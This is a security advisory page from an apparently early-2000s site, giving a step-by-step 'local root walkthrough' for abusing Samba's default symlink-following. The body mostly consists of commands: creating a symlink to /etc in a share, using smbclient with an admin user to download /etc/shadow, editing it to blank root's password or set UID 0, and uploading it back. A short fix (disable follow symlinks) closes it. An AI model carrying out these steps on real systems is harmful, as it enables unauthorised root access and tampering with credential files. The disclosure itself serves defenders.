[ advisories | exploits | discussions | news | conventions | security tools | texts & papers ]
 main menu
- feedback
- advertising
- privacy
- FightAIDS
- newsletter
- news
 
 discussions
- read forum
- new topic
- search
 

 meetings
- meetings list
- recent additions
- add your info
 
 top 100 sites
- visit top sites
- sign up now
- members
 
 webmasters

- add your url
- add domain
- search box
- link to us

 
 projects
- our projects
- free email
 
 m4d network
- security software
- secureroot
- m4d.com
Home : Advisories : Symlink attack in (all?) Samba

Title: Symlink attack in (all?) Samba
Released by: Tozz
Date: 14th December 2000
Printable version: Click here
Symlink attack in (all?) Samba. - Local root walkthrough by Tozz

=================================================================



Requirements:



* Shell access or any other way to create symlinks

* A running samba deamon

* The username and/or password of a user named in the

  admin lists in one or more shares.

* Brains are not required.



By default, Samba (http://www.samba.org) followes symlinks, which can lead

to

root promises. Here is an example:



I have a guy that sorts out all my uploads through SMB, he has 'admin'

access

(admin users = username).. This means he will work as UID 0 (root).



e.g. we have this share in /etc/smb.conf



[uploads]

 path = /home/ftp/incoming

 comment = Uploads that came through anon ftp

 guest ok = no

 writeable = no

 force create mode = 0755

 force directory mode = 0755

 admin users = warezmaster



Login to the shell, or find some other way to create symlinks

and create a symlink in /home/ftp/incoming

you do something like



ln /etc -s



now type on you're box (local or remote works both):

smbclient file://foobar.com/uploads -U warezmaster

it will ask for a password, enter it and you will get something like



smb\:>



There we go



smb\:>cd etc

smb\:>get shadow

smb\:>exit



[root@embrace /root]

now you downloaded the shadow file on you're localbox

edit it, change you're UID to 0, or remove the password

from the root account (no password required at logon)



login with smbclient again



smbclient file://foobar.com/uploads -U warezmaster

enter the password



and reupload



smb\:>cd etc

smb\:>put shadow

smb\:>exit



that's it, now login to the shell, if you changed you're own uid

you are now root. If you removed the password from root account

just su to it and you wont need a password.



Note:



The 'Follow Symlinks' can be turned off, but it's on by default.





Fix:



Disable Follow Symlinks





Bye,

Tozz (tozz@hackers4hackers.org)



You can contact me on AxeNet (irc.axenet.org channel #axenet).nickname: Tozz

or MemoServ me when I'm not online.








(C) 1999-2000 All rights reserved.